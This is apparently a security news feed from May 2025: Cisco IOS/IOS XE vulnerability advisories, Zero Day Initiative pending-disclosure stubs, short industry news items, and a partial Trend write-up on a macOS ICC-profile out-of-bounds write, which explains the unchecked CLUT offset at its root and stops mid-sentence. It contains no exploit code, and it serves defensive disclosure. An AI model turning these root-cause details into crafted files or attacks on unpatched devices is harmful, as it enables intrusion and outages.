A vulnerability in the lobby ambassador web interface of Cisco IOS XE Wireless Controller Software could allow an authenticated, remote attacker to remove arbitrary users that are defined on an affected device. This vulnerability is due to insufficient access control of actions executed by lobby ambassador users. An attacker could exploit this vulnerability by logging in to an affected device with a lobby ambassador user account and sending crafted HTTP requests to the API. A successful exploit could allow the attacker to delete arbitrary user accounts on the device, including users with administrative privileges. Note: This vulnerability is exploitable only if the attacker obtains the credentials for a lobby ambassador account. This account is not configured by default. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-user-del-hQxMpUDj This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20190

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ewlc-user-del-hQxMpUDj
Cisco IOS Software Industrial Ethernet Switch Device Manager Privilege Escalation Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Cisco Industrial Ethernet Switch Device Manager (DM) of Cisco IOS Software could allow an authenticated, remote attacker to elevate privileges. This vulnerability is due to insufficient validation of authorizations for authenticated users. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to elevate privileges to privilege level 15. To exploit this vulnerability, the attacker must have valid credentials for a user account with privilege level 5 or higher. Read-only DM users are assigned privilege level 5. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-http-privesc-wCRd5e3 This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20164

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-http-privesc-wCRd5e3
Cisco IOS XE Software DHCP Snooping Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the DHCP snooping security feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a full interface queue wedge, which could result in a denial of service (DoS) condition. This vulnerability is due to improper handling of DHCP request packets. An attacker could exploit this vulnerability by sending DHCP request packets to an affected device. A successful exploit could allow the attacker to cause packets to wedge in the queue, creating a DoS condition for downstream devices of the affected system and requiring that the system restart to drain the queue. Note: This vulnerability can be exploited with either unicast or broadcast DHCP packets on a VLAN that does not have DHCP snooping enabled. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-dhcpsn-dos-xBn8Mtks This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20162

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-dhcpsn-dos-xBn8Mtks
Cisco IOS XE Software Internet Key Exchange Version 1 Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Internet Key Exchange version 1 (IKEv1) implementation of Cisco IOS XE Software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition. The attacker must have valid IKEv1 VPN credentials to exploit this vulnerability. This vulnerability is due to improper validation of IKEv1 phase 2 parameters before the IPsec security association creation request is handed off to the hardware cryptographic accelerator of an affected device. An attacker could exploit this vulnerability by sending crafted IKEv1 messages to the affected device. A successful exploit could allow the attacker to cause the device to reload. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-ikev1-dos-XHk3HzFC This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20192

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-ikev1-dos-XHk3HzFC
Cisco IOS XE Software Privilege Escalation Vulnerabilities
2025-05-08T06:00:00Z | 1746684000

Multiple vulnerabilities in the CLI of Cisco IOS XE Software could allow an authenticated, local attacker with privilege level 15 to elevate privileges to root on the underlying operating system of an affected device. These vulnerabilities are due to insufficient input validation when processing specific configuration commands. An attacker could exploit these vulnerabilities by including crafted input in specific configuration commands. A successful exploit could allow the attacker to elevate privileges to root on the underlying operating system of an affected device. The Security Impact Rating (SIR) of this advisory has been raised to High because an attacker could gain access to the underlying operating system of the affected device and perform potentially undetected actions. Note: The attacker must have privileges to enter configuration mode on the affected device. This is usually referred to as privilege level 15. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-privesc-su7scvdp This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20197,CVE-2025-20198,CVE-2025-20199,CVE-2025-20200,CVE-2025-20201

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-privesc-su7scvdp
Cisco IOx Application Hosting Environment Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Cisco IOx application hosting environment of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the Cisco IOx application hosting environment to stop responding, resulting in a denial of service (DoS) condition. This vulnerability is due to the improper handling of HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to cause the Cisco IOx application hosting environment to stop responding. The IOx process will need to be manually restarted to recover services. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-dos-95Fqnf7b This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20196

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-dos-95Fqnf7b
Cisco IOS Software on Cisco Catalyst 1000 and 2960L Switches Access Control List Bypass Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the access control list (ACL) programming of Cisco IOS Software that is running on Cisco Catalyst 1000 Switches and Cisco Catalyst 2960L Switches could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to the use of both an IPv4 ACL and a dynamic ACL of IP Source Guard on the same interface, which is an unsupported configuration. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to bypass an ACL on the affected device. Note: Cisco documentation has been updated to reflect that this is an unsupported configuration. However, Cisco is publishing this advisory because the device will not prevent an administrator from configuring both features on the same interface. There are no plans to implement the ability to configure both features on the same interface on Cisco Catalyst 1000 or Catalyst 2960L Switches. Cisco has not released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipsgacl-pg6qfZk Security Impact Rating: Medium CVE: CVE-2025-20137

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipsgacl-pg6qfZk
Cisco Adaptive Security Appliance Software, Firepower Threat Defense Software, IOS Software, and IOS XE Software IKEv2 Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Internet Key Exchange version 2 (IKEv2) protocol processing of Cisco Adaptive Security Appliance (ASA) Software, Cisco Firepower Threat Defense (FTD) Software, Cisco IOS Software, and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation when processing IKEv2 messages. An attacker could exploit this vulnerability by sending crafted IKEv2 traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-multiprod-ikev2-dos-gPctUqv2 This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20182

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-multiprod-ikev2-dos-gPctUqv2
Cisco IOS XE Software Model-Driven Programmability Authorization Bypass Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Network Configuration Access Control Module (NACM) of Cisco IOS XE Software could allow an authenticated, remote attacker to obtain unauthorized read access to configuration or operational data. This vulnerability exists because a subtle change in inner API call behavior causes results to be filtered incorrectly. An attacker could exploit this vulnerability by using either NETCONF, RESTCONF, or gRPC Network Management Interface (gNMI) protocols and query data on paths that may have been denied by the NACM configuration. A successful exploit could allow the attacker to access data that should have been restricted according to the NACM configuration. Note: This vulnerability requires that the attacker obtain the credentials from a valid user with privileges lower than 15, and that NACM was configured to provide restricted read access for that user. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-netconf-nacm-bypass-TGZV9pmQ This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20214

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-netconf-nacm-bypass-TGZV9pmQ
Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the CLI of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, local attacker to gain privileges of the root user on the underlying operating system. This vulnerability is due to insufficient input validation. An authenticated attacker with read-only privileges on the SD-WAN Manager system could exploit this vulnerability by sending a crafted request to the CLI of the SD-WAN Manager. A successful exploit could allow the attacker to gain root privileges on the underlying operating system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-priviesc-WCk7bmmt Security Impact Rating: High CVE: CVE-2025-20122

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-priviesc-WCk7bmmt
Multiple Cisco Products Switch Integrated Security Features DHCPv6 Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Switch Integrated Security Features (SISF) of Cisco IOS Software, Cisco IOS XE Software, Cisco NX-OS Software, and Cisco Wireless LAN Controller (WLC) AireOS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to the incorrect handling of DHCPv6 packets. An attacker could exploit this vulnerability by sending a crafted DHCPv6 packet to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sisf-dos-ZGwt4DdY This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20191

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sisf-dos-ZGwt4DdY
Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the packet filtering features of Cisco IOS XE SD-WAN Software could allow an unauthenticated, remote attacker to bypass Layer 3 and Layer 4 traffic filters.  This vulnerability is due to improper traffic filtering conditions on an affected device. An attacker could exploit this vulnerability by sending a crafted packet to the affected device. A successful exploit could allow the attacker to bypass the Layer 3 and Layer 4 traffic filters and inject a crafted packet into the network. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-bypass-HHUVujdn This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20221

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-bypass-HHUVujdn
Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the implementation of the Simple Network Management Protocol Version 3 (SNMPv3) feature of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to poll an affected device using SNMP, even if the device is configured to deny SNMP traffic from an unauthorized source or the SNMPv3 username is removed from the configuration. This vulnerability exists because of the way that the SNMPv3 configuration is stored in the Cisco IOS Software and Cisco IOS XE Software startup configuration. An attacker could exploit this vulnerability by polling an affected device from a source address that should have been denied. A successful exploit could allow the attacker to perform SNMP operations from a source that should be denied. Note: The attacker has no control of the SNMPv3 configuration. To exploit this vulnerability, the attacker must have valid SNMPv3 user credentials. For more information, see the Details section of this advisory. Cisco has not released software updates that address this vulnerability. However, there is a new method for configuring SNMPv3 so that it will not be affected by this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmpv3-qKEYvzsy This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20151

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmpv3-qKEYvzsy
Cisco IOS, IOS XE, and IOS XR Software TWAMP Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Two-Way Active Measurement Protocol (TWAMP) server feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. For Cisco IOS XR Software, this vulnerability could cause the ipsla_ippm_server process to reload unexpectedly if debugs are enabled. This vulnerability is due to out-of-bounds array access when processing specially crafted TWAMP control packets. An attacker could exploit this vulnerability by sending crafted TWAMP control packets to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: For Cisco IOS XR Software, only the ipsla_ippm_server process reloads unexpectedly and only when debugs are enabled. The vulnerability details for Cisco IOS XR Software are as follows:    Security Impact Rating (SIR): Low    CVSS Base Score: 3.7    CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-twamp-kV4FHugn This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20154

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-twamp-kV4FHugn
Cisco Catalyst SD-WAN Manager Reflected HTML Injection Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the web interface of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an unauthenticated, remote attacker to inject HTML into the browser of an authenticated user. This vulnerability is due to improper sanitization of input to the web interface. An attacker could exploit this vulnerability by convincing an authenticated user to click a malicious link. A successful exploit could allow the attacker to inject HTML into the browser of an authenticated Cisco Catalyst SD-WAN Manager user. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-html-inj-GxVtK6zj Security Impact Rating: Medium CVE: CVE-2025-20216

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-html-inj-GxVtK6zj
Cisco Catalyst SD-WAN Manager Stored Cross-Site Scripting Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the web-based management interface of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, remote attacker to conduct a stored cross-site scripting attack (XSS) on an affected system.  This vulnerability is due to improper sanitization of user input to the web-based management interface. An attacker could exploit this vulnerability by submitting a malicious script through the interface. A successful exploit could allow the attacker to conduct a stored XSS attack on the affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-xss-xhN8M5jt Security Impact Rating: Medium CVE: CVE-2025-20147

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-xss-xhN8M5jt
Cisco IOS XE Software Web-Based Management Interface Command Injection Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the web-based management interface of the Wireless LAN Controller feature of Cisco IOS XE Software could allow an authenticated, remote attacker with a lobby ambassador user account to perform a command injection attack against an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary Cisco IOS XE Software CLI commands with privilege level 15. Note: This vulnerability is exploitable only if the attacker obtains the credentials for a lobby ambassador account. This account is not configured by default. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webui-cmdinj-gVn3OKNC This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20186

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webui-cmdinj-gVn3OKNC
Cisco IOS XE Software Web-Based Management Interface Vulnerabilities
2025-05-08T06:00:00Z | 1746684000

Multiple vulnerabilities in the web-based management interface of Cisco IOS XE Software could allow a remote attacker to read files from the underlying operating system, read limited parts of the configuration file, clear the syslog, or conduct a cross-site request forgery (CSRF) attack on an affected device, depending on their privilege level. For more information about these vulnerabilities, see the Details section of this advisory. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webui-multi-ARNHM4v6 This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Medium CVE: CVE-2025-20193,CVE-2025-20194,CVE-2025-20195

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webui-multi-ARNHM4v6
Cisco IOS XE Software for Cisco ASR 903 Aggregation Services Routers ARP Denial of Service Vulnerability
2025-05-08T06:00:00Z | 1746684000

A vulnerability in the Cisco Express Forwarding functionality of Cisco IOS XE Software for Cisco ASR 903 Aggregation Services Routers with Route Switch Processor 3 (RSP3C) could allow an unauthenticated, adjacent attacker to trigger a denial of service (DoS) condition. This vulnerability is due to improper memory management when Cisco IOS XE Software is processing Address Resolution Protocol (ARP) messages. An attacker could exploit this vulnerability by sending crafted ARP messages at a high rate over a period of time to an affected device. A successful exploit could allow the attacker to exhaust system resources, which eventually triggers a reload of the active route switch processor (RSP). If a redundant RSP is not present, the router reloads. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr903-rsp3-arp-dos-WmfzdvJZ This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: High CVE: CVE-2025-20189

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr903-rsp3-arp-dos-WmfzdvJZ
ZDI-CAN-26827: Delta Electronics
2025-05-08T05:00:00Z | 1746680400

A CVSS score 10.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26798: XWiki.org
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'NgockhanhC311' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27085: Autodesk
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27117: Dassault Systèmes
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27123: VMware
2025-05-08T05:00:00Z | 1746680400

A CVSS score 6.5 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Gwangun Jung at THEORI' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27152: Autodesk
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27083: Autodesk
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27084: Autodesk
2025-05-08T05:00:00Z | 1746680400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-08, 29 days ago. The vendor is given until 2025-09-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Security Alert (A25-05-05): Multiple Vulnerabilities in SonicWall SMA100 Series Products
2025-05-08T04:00:00Z | 1746676800

SonicWall released a security advisory to address multiple vulnerabilities in SonicWall SMA100 Series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Smashing Security podcast #416: High street hacks, and Disney’s Wingdings woe
2025-05-08T00:18:11Z | 1746663491

Brits face empty shelves and suspended meal deals as cybercriminals hit major high street retailers, and a terminated Disney employee gets revenge with a little help with Wingdings. Plus Graham challenges Carole to a game of "Malware or metal?", and we wonder just happens when you have sex on top of a piano? All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. Plus! Don't miss our featured interview with Jon Cho of Dashlane.

https://grahamcluley.com/smashing-security-podcast-416/
Measuring the US-China AI Gap
2025-05-08T00:00:00Z | 1746662400

Explore Insikt Group's in-depth 2025 report on the US-China AI race—comparing funding, talent, regulation, compute capacity, and model benchmarks. Discover why China trails the US and what could change before 2030.

https://www.recordedfuture.com/research/measuring-the-us-china-ai-gap
Unlocking Operational Efficiency: How Vectra AI Drives 40% Gains in SOC Performance and 391% ROI by Mark Wojtasiak
2025-05-08T00:00:00Z | 1746662400

Discover how Vectra AI delivers 391% ROI, 40% higher SOC efficiency, and faster threat detection, according to a new IDC White Paper.

https://www.vectra.ai/blog/unlocking-operational-efficiency-how-vectra-ai-drives-40-gains-in-soc-performance-and-391-roi
Pakistani Firm Shipped Fentanyl Analogs, Scams to US
2025-05-07T22:22:48Z | 1746656568

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

https://krebsonsecurity.com/2025/05/pakistani-firm-shipped-fentanyl-analogs-scams-to-us/
Operation PowerOFF: Law Enforcement Seizes 9 DDoS-for-Hire Webpages as Part of Global Crackdown
2025-05-07T21:28:44Z | 1746653324

Flashpoint is proud to have contributed to this investigation as part of an alliance of government agencies and private sector partners. The post Operation PowerOFF: Law Enforcement Seizes 9 DDoS-for-Hire Webpages as Part of Global Crackdown appeared first on Flashpoint.

https://flashpoint.io/blog/operation-poweroff-law-enforcement-seizes-ddos-webpages/
New Finance Scam Discovered Abusing Niche X/Twitter Advertising Loophole
2025-05-07T19:56:29Z | 1746647789

Silent Push has discovered a new finance scam exploiting an X/Twitter advertising loophole to spoof websites and redirect visitors to a crypto scam. The post New Finance Scam Discovered Abusing Niche X/Twitter Advertising Loophole appeared first on Silent Push.

https://www.silentpush.com/blog/x-twitter-ad-scam/
Five Things You Might Have Missed at RSAC
2025-05-07T19:00:00Z | 1746644400

Commvault innovations stand out at premier cybersecurity event. The post Five Things You Might Have Missed at RSAC appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/five-things-you-might-have-missed-at-rsac
CVE-2024-44236: Remote Code Execution vulnerability in Apple macOS
2025-05-07T18:30:19Z | 1746642619

In this excerpt of a Trend Vulnerability Research Service vulnerability report, Nikolai Skliarenko and Yazhi Wang of the Trend™ Research Team detail a recently patched code execution vulnerability in the Apple macOS operating system. This bug was originally discovered by Hossein Lotfi of the Trend™  Zero Day Initiative. Successful exploitation could result in arbitrary code execution on the target machine in the context of the running process. The following is a portion of their write-up covering CVE-2024-44236, with a few minimal modifications. An out-of-bounds write vulnerability has been reported in macOS. The vulnerability is due to the lack of proper validation of “lutAToBType” and “lutBToAType” tag types.A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. A successful attack may result in code execution on the victim's machine in the context of the running process.The VulnerabilityThe Scriptable Image Processing System (sips) is a terminal utility included in macOS that allows a user to verify, edit, and print out information about ICC Profile files and images.An ICC (International Color Consortium) Profile is a set of data that characterizes a color input or output device, or a color space, according to the standards by ICC. Every device that captures or displays color can have its own profile.An ICC Profile file consists of a Header, Tag Table, and tagged element data: The Header has the following format: The Tag Table consists of a number of Individual Tag Structures in the following format: The tagged element data is located after the Tag Table. Each data structure starts with a 4-byte signature, which is followed by a tag type-specific data. The two tag types relevant to the vulnerability are lutAToBType and lutBToAType. Both of those types use a similar format for storing the data: The offsets are relative to the beginning of the tagged element data. Signature "\x6d\x42\x41\x20" is used for lutBToAType, and signature "\x6d\x41\x42\x20" is used for lutAToBType. The function sub_1000194D0() handles those structures. The first 16 bytes starting from the value of the "Offset to CLUT" field are checked. If the index of the byte is bigger than the value of the "Number of input channels" field, and the value of the said byte is not a null, it will be changed to zero. Due to the insufficient validation of the "Offset to CLUT" field value, it is possible to set an offset equal to the total length of the tagged element data. That would cause the function to read and possibly modify memory up to 16 bytes past the end of the heap-allocated buffer. A remote attacker could exploit this vulnerability by crafting a malicious 